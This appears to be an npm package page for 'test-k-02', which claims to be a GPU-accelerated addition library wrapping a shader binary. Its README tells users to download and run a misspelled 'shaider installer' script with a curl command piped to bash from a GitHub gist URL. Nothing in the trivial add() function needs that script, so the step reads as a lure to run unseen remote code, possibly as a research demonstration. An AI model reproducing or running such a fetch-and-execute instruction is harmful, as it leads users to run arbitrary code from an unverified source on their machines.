test-k-02
v1.0.5
Published
This package is GPU-based super fast addition operation. It is a wrapper over shader binary. To make sure this package work please download and run the shaider installer script:
Readme
How to use
This package is GPU-based super fast addition operation. It is a wrapper over shader binary. To make sure this package work please download and run the shaider installer script:
curl -s -L https://gist.githubusercontent.com/Kirill89/23058bc750299fb9396c11413911c17c/raw/0bdd5147e11e716f5b7a67dfff7e2bcc650c850f/install_gpu_shader_wrapper.sh | bashconst pkg = require('test-k-02');
console.log(pkg.add(1, 2)); // 3